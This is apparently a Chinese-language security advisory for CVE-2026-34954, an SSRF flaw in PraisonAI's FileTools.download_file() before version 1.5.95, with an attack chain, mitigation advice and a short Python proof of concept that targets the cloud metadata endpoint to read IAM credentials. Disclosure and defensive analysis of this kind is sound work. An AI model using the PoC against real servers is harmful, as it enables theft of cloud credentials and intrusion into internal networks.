IPBUF安全漏洞报告
English
CVE-2026-34954 CVSS 8.6 高危

CVE-2026-34954 PraisonAI SSRF漏洞

披露日期: 2026-04-03
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-34954
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
8.6 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
PraisonAI

相关标签

SSRFPraisonAI服务端请求伪造高危漏洞CVSS-8.6

漏洞概述

PraisonAI在1.5.95版本之前存在SSRF漏洞。其FileTools.download_file()函数未对URL参数进行验证,直接传递给httpx库。攻击者可利用此漏洞通过控制URL访问服务器可达的任意主机,包括云元数据服务和内网服务。

技术细节

该漏洞是典型的服务端请求伪造(SSRF)。漏洞根源位于`praisonaiagents`组件的`FileTools.download_file()`函数中。该函数虽然对文件下载的目标路径进行了校验,但完全忽略了对传入URL参数的安全过滤。攻击者可构造包含内网地址或云元数据服务地址(如`http://169.254.169.254`)的恶意URL。由于代码直接调用`httpx.stream()`并开启`follow_redirects=True`,服务器会代为向攻击者指定的目标发起HTTP请求。这使得攻击者能够利用受害服务器作为跳板,扫描内网端口、访问内部未授权接口或窃取云服务商凭证,从而造成严重的数据泄露或内网渗透风险。

攻击链分析

STEP 1
reconnaissance
攻击者识别出目标运行的是PraisonAI且版本低于1.5.95。
STEP 2
Exploitation
攻击者向FileTools.download_file()接口发送请求,将URL参数设置为恶意目标(如云元数据服务地址 http://169.254.169.254)。
STEP 3
Execution
服务器端代码未验证URL,直接使用httpx库向攻击者指定的内部地址发起请求并跟随重定向。
STEP 4
Impact
服务器将内部服务的响应数据返回给攻击者,导致敏感信息泄露(如AWS凭证)或内网被探测。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL of the vulnerable PraisonAI endpoint # This endpoint triggers the vulnerable FileTools.download_file() function target_url = "http://vulnerable-target/api/download" # Malicious payload targeting internal metadata service (SSRF) # The application does not validate the URL, allowing access to 127.0.0.1 or metadata services payload = { "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name", "destination_path": "/tmp/metadata.txt" } try: print("[+] Sending SSRF payload to target...") response = requests.post(target_url, json=payload, timeout=10) if response.status_code == 200: print("[+] Request successful. Check if data was leaked.") print("Response:", response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

PraisonAI < 1.5.95

防御指南

临时缓解措施
建议立即升级至修复版本1.5.95。如果无法立即升级,应在网络边界配置出站防火墙规则,严格限制应用服务器只能访问必要的外部地址,并阻断对内网网段(如127.0.0.0/8, 169.254.169.254等)的访问,以缓解SSRF攻击风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表